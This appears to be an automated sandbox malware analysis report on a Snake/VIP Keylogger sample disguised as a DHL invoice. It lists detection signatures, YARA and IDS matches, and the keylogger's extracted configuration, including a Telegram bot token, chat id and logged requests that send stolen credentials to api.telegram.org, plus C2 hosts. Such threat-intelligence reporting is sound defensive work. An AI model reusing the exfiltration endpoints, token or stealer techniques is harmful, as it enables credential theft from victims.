
Windows Analysis Report
DHL DOC INV 191224.gz.exe

Overview

General Information

Sample name: DHL DOC INV 191224.gz.exe
Analysis ID: 1583321
MD5: 49a44e1bd7ae31824843c4316f35eb35
SHA1: 29ca56d04c4d089d7aa30df2d3480988da425fc0
SHA256: 9ea5173104481c6538cb5fcdadc74682b3d422750039ab3311afe694e59b4602
Tags: DHL, exe, SnakeKeylogger, user-cocaman

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DHL DOC INV 191224.gz.exe (PID: 2612 cmdline: "C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe" MD5: 49A44E1BD7AE31824843C4316F35EB35)
    • RegSvcs.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU", "Chat id": "7360475312", "Version": "4.4"}
{"Exfil Mode": "Telegram", "Token": "7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU", "Chat_id": "7360475312", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x26a26:$a1: get_encryptedPassword
  • 0x26d1f:$a2: get_encryptedUsername
  • 0x26836:$a3: get_timePasswordChanged
  • 0x2693f:$a4: get_passwordField
  • 0x26a3c:$a5: set_encryptedPassword
  • 0x2801a:$a7: get_logins
  • 0x27f7d:$a10: KeyLoggerEventArgs
  • 0x27c06:$a11: KeyLoggerEventArgsEventHandler
(truncated; 15 entries in the full report)
Source | Rule | Description | Author | Strings
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
2.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x26a26:$a1: get_encryptedPassword
  • 0x26d1f:$a2: get_encryptedUsername
  • 0x26836:$a3: get_timePasswordChanged
  • 0x2693f:$a4: get_passwordField
  • 0x26a3c:$a5: set_encryptedPassword
  • 0x2801a:$a7: get_logins
  • 0x27f7d:$a10: KeyLoggerEventArgs
  • 0x27c06:$a11: KeyLoggerEventArgsEventHandler
(truncated; 12 entries in the full report)
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T13:45:10.132397+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | TCP
2025-01-02T13:45:38.151146+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49818 | 188.114.97.3 | 443 | TCP
2025-01-02T13:45:39.381953+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49825 | 188.114.97.3 | 443 | TCP
2025-01-02T13:45:42.319795+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49841 | 188.114.97.3 | 443 | TCP
2025-01-02T13:45:07.967448+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | TCP
2025-01-02T13:45:09.561231+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | TCP
2025-01-02T13:45:21.795605+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 193.122.130.0 | 80 | TCP
2025-01-02T13:45:47.901899+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49879 | 149.154.167.220 | 443 | TCP
2025-01-02T13:45:46.844932+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49868 | 149.154.167.220 | 443 | TCP


AV Detection

Source: 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU", "Chat_id": "7360475312", "Version": "4.4"}
Source: 2.2.RegSvcs.exe.400000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU", "Chat id": "7360475312", "Version": "4.4"}
Source: RegSvcs.exe.6608.2.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendMessage"}
Source: DHL DOC INV 191224.gz.exe | Virustotal: Detection: 47%
Source: DHL DOC INV 191224.gz.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: DHL DOC INV 191224.gz.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: DHL DOC INV 191224.gz.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 192.168.2.5:49706 -> 188.114.97.3:443 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49868 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2050803231.0000000003880000.00000004.00001000.00020000.00000000.sdmp, DHL DOC INV 191224.gz.exe, 00000000.00000003.2051726881.00000000036E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2050803231.0000000003880000.00000004.00001000.00020000.00000000.sdmp, DHL DOC INV 191224.gz.exe, 00000000.00000003.2051726881.00000000036E0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0039DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_0039DBBE
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0036C2A2 FindFirstFileExW | 0_2_0036C2A2
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A68EE FindFirstFileW,FindClose | 0_2_003A68EE
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_003A698F
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0039D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_0039D076
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0039D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_0039D3A9
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_003A9642
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_003A979D
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_003A9B2B
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A5C97 FindFirstFileW,FindNextFileW,FindClose | 0_2_003A5C97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 015AF2EDh | 2_2_015AF150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 015AF2EDh | 2_2_015AF33C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 015AF2EDh | 2_2_015AF3BF

Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49879 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49868 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2004/01/2025%20/%2001:55:27%0D%0ACountry%20Name:%20%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360475312&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd2c94d88c6ec6 | Host: api.telegram.org | Content-Length: 580
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49818 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49825 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49841 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent | 0_2_003ACE44
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360475312&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd2c94d88c6ec6 | Host: api.telegram.org | Content-Length: 580
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 02 Jan 2025 12:45:46 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20a
Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360
Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003258000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en(
Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003253000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlBsq
Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.000000000315E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000002.00000002.4475356588.000000000315E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003118000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003289000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.000000000327A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000002.00000002.4475356588.000000000327A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/(
Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lBsq
Source: unknown | Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49868 version: TLS 1.2
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003AEAFF
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003AED6A
